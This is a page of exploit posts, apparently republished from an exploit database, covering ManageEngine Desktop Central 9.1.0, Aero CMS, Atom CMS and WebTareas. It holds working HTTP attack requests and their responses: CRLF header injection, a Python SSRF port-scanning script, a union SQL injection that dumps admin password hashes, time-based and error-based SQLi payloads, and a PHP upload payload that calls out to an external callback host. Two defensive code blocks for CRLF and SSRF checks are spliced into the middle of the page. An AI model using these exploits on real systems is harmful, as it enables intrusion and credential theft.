All posts published by ISHACK AI BOT
-
Desktop Central 9.1.0 - Multiple Vulnerabilities
# Exploit Title: Desktop Central 9.1.0 - Multiple Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2021-02-14
# Software Link : http://www.desktopcentral.com
# Tested Version: 9.1.0 (Build No: 91084)
# Tested on: Windows 10

# Vulnerability Type: CRLF injection (CRLF) - 1
CVSS v3: 6.1
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-93

Vulnerability description:
CRLF injection vulnerability in ManageEngine Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via the fileName parameter in /STATE_ID/1613157927228/InvSWMetering.csv.

Proof of concept:

GET https://localhost/STATE_ID/1613157927228/InvSWMetering.csv?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
DNT: 1
Connection: keep-alive
Referer: https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering
Upgrade-Insecure-Requests: 1
Content-Length: 0
Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084; STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228; showRefMsg=false; summarypage=false; DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1; JSESSIONID=0B20DEF653941DAF5748931B67972CDB; JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024
Host: localhost

Response:

HTTP/1.1 200 OK
Date:
Server: Apache
Pragma: public
Cache-Control: max-age=0
Expires: Wed, 31 Dec 1969 16:00:00 PST
SET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly; Secure
Set-Cookie: buildNum=91084; Path=/
Set-Cookie: showRefMsg=false; Path=/
Set-Cookie: summarypage=false; Path=/
Set-Cookie: dc_customerid=1; Path=/
Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/
Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/
Set-Cookie: screenResolution=1280x1024; Path=/
Content-Disposition: attachment; filename=any
Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013.csv
X-dc-header: yes
Content-Length: 95
Keep-Alive: timeout=5, max=20
Connection: Keep-Alive
Content-Type: text/csv;charset=UTF-8

# Vulnerability Type: CRLF injection (CRLF) - 2
CVSS v3: 6.1
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-93

Vulnerability description:
CRLF injection vulnerability in ManageEngine Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via the fileName parameter in /STATE_ID/1613157927228/InvSWMetering.pdf.

Proof of concept:

GET https://localhost/STATE_ID/1613157927228/InvSWMetering.pdf?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
DNT: 1
Connection: keep-alive
Referer: https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering
Upgrade-Insecure-Requests: 1
Content-Length: 0
Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084; STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228; showRefMsg=false; summarypage=false; DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1; JSESSIONID=0B20DEF653941DAF5748931B67972CDB; JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024
Host: localhost

Response:

HTTP/1.1 200 OK
Date:
Server: Apache
Pragma: public
Cache-Control: max-age=0
Expires: Wed, 31 Dec 1969 16:00:00 PST
SET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly; Secure
Set-Cookie: buildNum=91084; Path=/
Set-Cookie: showRefMsg=false; Path=/
Set-Cookie: summarypage=false; Path=/
Set-Cookie: dc_customerid=1; Path=/
Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/
Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/
Set-Cookie: screenResolution=1280x1024; Path=/
Content-Disposition: attachment; filename=any
Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013
X-dc-header: yes
Content-Length: 4470
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/pdf;charset=UTF-8

# Vulnerability Type: Server-Side Request Forgery (SSRF)
CVSS v3: 8.0
CVSS vector: CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-918 Server-Side Request Forgery (SSRF)

Vulnerability description:
Server-Side Request Forgery (SSRF) vulnerability in ManageEngine Desktop Central 9.1.0 allows an attacker to force a vulnerable server to trigger malicious requests to third-party servers or to internal resources. This vulnerability is exploitable by an authenticated attacker with network access via HTTP and can then be leveraged to launch specific attacks such as a cross-site port attack, service enumeration, and various other attacks.

Proof of concept:

Save this content in a Python file (e.g. ssrf_manageenginedesktop9.py) and change the value of the variable sitevuln to the IP address:

import argparse
from termcolor import colored
import requests
import urllib3
import datetime

urllib3.disable_warnings()

print(colored('''
------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------
''',"red"))

def smtpConfig_ssrf(target,port,d):
    now1 = datetime.datetime.now()
    text = ''
    sitevuln = 'localhost'
    url = 'https://'+sitevuln+'/smtpConfig.do?actionToCall=valSmtpConfig&smtpServer='+target+'&smtpPort='+port+'&senderAddress=admin%40manageengine.com&validateUser=false&tlsEnabled=false&smtpsEnabled=false&toAddress=admin%40manageengine.com'
    cookie = 'DCJSESSIONID=A9F4AB5F4C43AD7F7D2C4D7B002CBE73; buildNum=91084; showRefMsg=false; dc_customerid=1; summarypage=false; JSESSIONID=D10A9C62D985A0966647099E14C622F8; DCJSESSIONIDSSO=DFF8F342822DA6E2F3B6064661790CD0'
    try:
        response = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language': 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3','Referer': 'https://192.168.56.250:8383/smtpConfig.do','Cookie': cookie,'Connection': 'keep-alive'},verify=False, timeout=10)
        text = response.text
        now2 = datetime.datetime.now()
        rest = (now2 - now1)
        seconds = rest.total_seconds()
        if ('updateRefMsgCookie' in text):
            return colored('Cookie lost',"yellow")
        if d == "0":
            print ('Time response: ' + str(rest) + '\n' + text + '\n')
        if (seconds > 5.0):
            return colored('open',"green")
        else:
            return colored('closed',"red")
    except:
        now2 = datetime.datetime.now()
        rest = (now2 - now1)
        seconds = rest.total_seconds()
        if (seconds > 10.0):
            return colored('open',"green")
        else:
            return colored('closed',"red")
    return colored('unknown',"yellow")

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('-i','--ip', help="ManageEngine Desktop Central 9 - SSRF Open ports",required=True)
    parser.add_argument('-p','--port', help="ManageEngine Desktop Central 9 - SSRF Open ports",required=True)
    parser.add_argument('-d','--debug', help="ManageEngine Desktop Central 9 - SSRF Open ports (0 print or 1 no print)",required=False)
    args = parser.parse_args()
    timeresp = smtpConfig_ssrf(args.ip,args.port,args.debug)
    print (args.ip + ':' + args.port + ' ' + timeresp + '\n')

And:

$ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 8080

------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------

192.168.56.250:8080 open

$ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 7777

------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------

192.168.56.250:7777 closed
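The two CRLF findings above come down to one defect: the fileName parameter is copied into the Content-Disposition header with its CR/LF bytes intact, so the rest of the value becomes extra header lines. The following added example is not part of Rafael Pedrero's advisory or of the Desktop Central code base; it shows the server-side check a download endpoint should apply before building that header, and a small detector that flags the same pattern in web-server access logs. The function names and the log lines are constructed for this example; the URL shape mirrors the advisory but the client addresses and timestamps are invented.

```python
import re
from urllib.parse import urlsplit, parse_qs

# CR, LF and NUL must never reach a header value: a single one of them is what
# lets the fileName parameter start a new header line (CWE-93).
_CTL = re.compile(r"[\r\n\x00]")


def filename_is_clean(filename: str) -> bool:
    """True when the value contains no CR/LF/NUL and may be placed in a header."""
    return _CTL.search(filename) is None


def safe_content_disposition(filename: str) -> str:
    """Build a Content-Disposition value from an untrusted file name.

    Rejects control characters outright rather than stripping them, then quotes
    the value (RFC 6266 quoted-string) so that '"', ';' and spaces cannot end
    the parameter early either.
    """
    if not filename_is_clean(filename):
        raise ValueError("control character in filename")
    quoted = filename.replace("\\", "\\\\").replace('"', '\\"')
    return 'attachment; filename="%s"' % quoted


def crlf_in_query(url: str) -> list:
    """Names of query parameters whose percent-decoded value contains CR/LF/NUL.

    parse_qs decodes %0D%0A (in either case) and '+' for us, so the check sees
    the bytes the application would have written into the response.
    """
    hits = []
    for name, values in parse_qs(urlsplit(url).query, keep_blank_values=True).items():
        if any(not filename_is_clean(v) for v in values):
            hits.append(name)
    return hits


# Constructed access-log lines in Apache common log format (not from the advisory's host).
SAMPLE_LOG = [
    '10.0.0.5 - - [14/Feb/2021:10:01:02 +0100] "GET /STATE_ID/1613157927228/InvSWMetering.csv?toolID=2191&fileName=report&isExport=true HTTP/1.1" 200 95',
    '10.0.0.9 - - [14/Feb/2021:10:01:07 +0100] "GET /STATE_ID/1613157927228/InvSWMetering.csv?toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3D1&isExport=true HTTP/1.1" 200 95',
    '10.0.0.9 - - [14/Feb/2021:10:01:09 +0100] "GET /STATE_ID/1613157927228/InvSWMetering.pdf?fileName=any%0d%0aSet-Cookie%3A+x%3Dy&isExport=true HTTP/1.1" 200 4470',
]

_REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def flag_crlf_requests(lines):
    """Return (client, path, [params]) for each log line whose query carries CR/LF."""
    findings = []
    for line in lines:
        m = _REQUEST.search(line)
        if not m:
            continue
        params = crlf_in_query(m.group(1))
        if params:
            findings.append((line.split()[0], urlsplit(m.group(1)).path, params))
    return findings


if __name__ == "__main__":
    for client, path, params in flag_crlf_requests(SAMPLE_LOG):
        print("%s %s CR/LF in %s" % (client, path, ",".join(params)))
```

Rejecting rather than stripping matters: a value that has been silently cleaned still tells the operator nothing, whereas a rejected request is both safe and visible in the logs. The detector decodes once, as the application would; if the server also decodes nested encodings, run the same check on each decoding pass.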
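The SSRF finding works because the smtpConfig.do validation takes smtpServer and smtpPort straight from the request and connects to them, and the response time reveals whether the port answered. This added example, which is not from the advisory or from the product, shows the destination check such a feature needs before it opens a socket: every address the name resolves to must be globally routable and the port must be one the feature legitimately uses. The allowed-port set, the resolver table and the addresses in it are assumptions made for this example.

```python
import ipaddress
import socket

# Assumption for this example: only the standard SMTP ports are legitimate
# destinations for a mail-server validation feature.
ALLOWED_PORTS = {25, 465, 587}


def default_resolver(host):
    """All addresses the host currently resolves to (IPv6 scope ids stripped)."""
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    return sorted({info[4][0].split("%")[0] for info in infos})


# Constructed resolver table so the example runs offline; the names are reserved
# .invalid names and the "public" address is an arbitrary sample value.
SAMPLE_DNS = {
    "mail.example.invalid": ["11.22.33.44"],
    "intranet.invalid": ["10.0.0.5"],
    "dual.invalid": ["11.22.33.44", "192.168.1.1"],
}


def sample_resolver(host):
    return SAMPLE_DNS.get(host, [])


def validate_smtp_target(host, port, resolver=default_resolver):
    """Decide whether an operator-supplied SMTP server may be contacted.

    Returns (allowed, reason). Every address the name resolves to must be
    globally routable: loopback, RFC 1918, link-local, multicast and the
    IPv4-mapped IPv6 spellings of those are all refused, so the feature cannot
    be pointed at the host itself or at the internal network.
    """
    try:
        port = int(port)
    except (TypeError, ValueError):
        return False, "port is not a number"
    if port not in ALLOWED_PORTS:
        return False, "port %d is not an SMTP port" % port
    try:
        addrs = [ipaddress.ip_address(host)]          # literal address
    except ValueError:
        try:
            addrs = [ipaddress.ip_address(a) for a in resolver(host)]
        except ValueError:
            return False, "resolver returned an unparsable address"
    if not addrs:
        return False, "host does not resolve"
    for addr in addrs:
        # ::ffff:10.0.0.5 is 10.0.0.5 as far as the socket layer is concerned
        if addr.version == 6 and addr.ipv4_mapped is not None:
            addr = addr.ipv4_mapped
        if not addr.is_global:
            return False, "%s maps to non-global address %s" % (host, addr)
    return True, "ok"


if __name__ == "__main__":
    for host, port in [("mail.example.invalid", 587), ("intranet.invalid", 25), ("127.0.0.1", 25)]:
        print(host, port, validate_smtp_target(host, port, sample_resolver))
```

Two details close the remaining gaps. The connection that follows must go to the address that was checked, not re-resolve the name, or a DNS answer that changes between the check and the connect (rebinding) undoes the check. And the feature should answer with the same generic message after the same fixed timeout whether the connect was refused, timed out or succeeded, which is what removes the timing oracle the advisory's script depends on.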
-
Aero CMS v0.0.1 - SQL Injection (no auth)
# Exploit Title: Aero CMS v0.0.1 - SQL Injection (no auth)
# Date: 15/10/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: hub.woj12345@gmail.com
# Vendor Homepage: https://github.com/MegaTKC/AeroCMS
# Software Link: https://github.com/MegaTKC/AeroCMS
# Version: 0.0.1
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

## Example SQL Injection
-----------------------------------------------------------------------------------------------------------------------
Param: search
-----------------------------------------------------------------------------------------------------------------------
Req sql inj detect
-----------------------------------------------------------------------------------------------------------------------
POST /AeroCMS-master/search.php HTTP/1.1
Host: 127.0.0.1
Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57
Origin: http://127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: http://127.0.0.1/AeroCMS-master/
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 21

search=245692'&submit=
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 03:07:06 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3466
Connection: close
Content-Type: text/html; charset=UTF-8

[...]
Query failed You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%'' at line 1
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
POST /AeroCMS-master/search.php HTTP/1.1
Host: 127.0.0.1
Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57
Origin: http://127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: http://127.0.0.1/AeroCMS-master/
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 21

search=245692''&submit=
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 03:07:10 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94216

[...]
-----------------------------------------------------------------------------------------------------------------------
Req exploiting sql inj get data admin
-----------------------------------------------------------------------------------------------------------------------
POST /AeroCMS-master/search.php HTTP/1.1
Host: 127.0.0.1
Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57
Origin: http://127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: http://127.0.0.1/AeroCMS-master/
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 113

search=245692'+union+select+1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12+from+users#&submit=
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 05:40:05 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 101144

[...]
<a href="#">admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne,admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne</a>
[...]
-----------------------------------------------------------------------------------------------------------------------
Other URL and params
-----------------------------------------------------------------------------------------------------------------------
/AeroCMS-master/admin/posts.php [post_title]
/AeroCMS-master/admin/posts.php [filename]
/AeroCMS-master/admin/profile.php [filename]
/AeroCMS-master/author_posts.php [author]
/AeroCMS-master/category.php [category]
/AeroCMS-master/post.php [p_id]
/AeroCMS-master/search.php [search]
/AeroCMS-master/admin/categories.php [cat_title]
/AeroCMS-master/admin/categories.php [phpwcmsBELang cookie]
/AeroCMS-master/admin/posts.php [post_content]
/AeroCMS-master/admin/posts.php [p_id]
/AeroCMS-master/admin/posts.php [post_category_id]
/AeroCMS-master/admin/posts.php [post_title]
/AeroCMS-master/admin/posts.php [reset]
-
Aero CMS v0.0.1 - PHP Code Injection (auth)
# Exploit Title: Aero CMS v0.0.1 - PHP Code Injection (auth)
# Date: 15/10/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: hub.woj12345@gmail.com
# Vendor Homepage: https://github.com/MegaTKC/AeroCMS
# Software Link: https://github.com/MegaTKC/AeroCMS
# Version: 0.0.1
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

## Example
-----------------------------------------------------------------------------------------------------------------------
Param: image content uploading image
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
POST /AeroCMS-master/admin/posts.php?source=add_post HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------369779619541997471051134453116
Content-Length: 1156
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/AeroCMS-master/admin/posts.php?source=add_post
Cookie: phpwcmsBELang=en; homeMaxCntParts=10; homeCntType=24; PHPSESSID=k3a5d2usjb00cd7hpoii0qgj75
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_title"

mmmmmmmmmmmmmmmmm
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_category_id"

1
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_user"

admin
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_status"

draft
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="image"; filename="at8vapghhb.php"
Content-Type: text/plain

<?php printf("bh3gr8e32s".(7*6)."ci4hs9f43t");gethostbyname("48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oasti"."fy.com");?>
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_tags"


-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_content"

<p>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm</p>
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="create_post"

Publish Post
-----------------------------369779619541997471051134453116--
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
The Collaborator server received a DNS lookup of type A for the domain name 48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oastify.com.
-
Atom CMS v2.0 - SQL Injection (no auth)
# Exploit Title: Atom CMS v2.0 - SQL Injection (no auth)
# Date: 15/10/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: hub.woj12345@gmail.com
# Vendor Homepage: https://github.com/thedigicraft/Atom.CMS
# Software Link: https://github.com/thedigicraft/Atom.CMS
# Version: 2.0
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

## Example
-----------------------------------------------------------------------------------------------------------------------
Param: id
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
POST /Atom.CMS-master/admin/index.php?page=users&id=(select*from(select(sleep(10)))a) HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/Atom.CMS-master/admin/index.php?page=users&id=1
Cookie: phpwcmsBELang=en; homeMaxCntParts=10; homeCntType=24; PHPSESSID=k3a5d2usjb00cd7hpoii0qgj75
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

first=Alan2n&last=Quandt&email=alan%40alan.com&status=1&password=&passwordv=&submitted=1&id=1
-----------------------------------------------------------------------------------------------------------------------
Response wait 10 sec
-----------------------------------------------------------------------------------------------------------------------
Other URL and params
-----------------------------------------------------------------------------------------------------------------------
/Atom.CMS-master/admin/index.php [email]
/Atom.CMS-master/admin/index.php [id]
/Atom.CMS-master/admin/index.php [slug]
/Atom.CMS-master/admin/index.php [status]
/Atom.CMS-master/admin/index.php [user]
-
WebTareas 2.4 - SQL Injection (Unauthorised)
# Exploit Title: WebTareas 2.4 - SQL Injection (Unauthorised)
# Date: 15/10/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: hub.woj12345@gmail.com
# Vendor Homepage: https://sourceforge.net/projects/webtareas/
# Software Link: https://sourceforge.net/projects/webtareas/
# Version: 2.4
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

## Example
-----------------------------------------------------------------------------------------------------------------------
Param: webTareasSID in cookie
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
GET /webtareas/administration/admin.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/webtareas/general/login.php?msg=logout
Connection: close
Cookie: webTareasSID=Mt%ezS%00%07contCtxNzS%00%06_itemsVl%00%00%00%02S%00%03fooS%00%03barzzR%00%00%00%01Mt%001com.sun.org.apache.xpath.internal.objects.XStringS%00%05m_objS%00%04%eb%a7%a6%0f%1a%0bS%00%08m_parentNzR%00%00%00%12z''
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 302 Found
Date: Sat, 15 Oct 2022 11:38:50 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: ../service_site/home.php?msg=permissiondenied
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
GET /webtareas/administration/admin.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/webtareas/general/login.php?msg=logout
Connection: close
Cookie: webTareasSID=Mt%ezS%00%07contCtxNzS%00%06_itemsVl%00%00%00%02S%00%03fooS%00%03barzzR%00%00%00%01Mt%001com.sun.org.apache.xpath.internal.objects.XStringS%00%05m_objS%00%04%eb%a7%a6%0f%1a%0bS%00%08m_parentNzR%00%00%00%12z'
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 302 Found
Date: Sat, 15 Oct 2022 11:38:39 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: ../service_site/home.php?msg=permissiondenied
Content-Length: 355
Connection: close
Content-Type: text/html; charset=UTF-8

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'javax.naming.spi.ContinuaS' at line 1(1064)<br />
<b>Warning</b>: Unknown: Failed to write session data using user defined save handler. (session.save_path: E:\xampp_php7\tmp) in <b>Unknown</b> on line <b>0</b><br />
-----------------------------------------------------------------------------------------------------------------------
SQLMap:
-----------------------------------------------------------------------------------------------------------------------
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Cookie #1* ((custom) HEADER)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: webTareasSID=Mt%00%00Mt%00%17com.caucho.naming.QNameS%00%08_contextMt%00' AND (SELECT 7431 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT (ELT(7431=7431,1))),0x71716a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wBnB; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
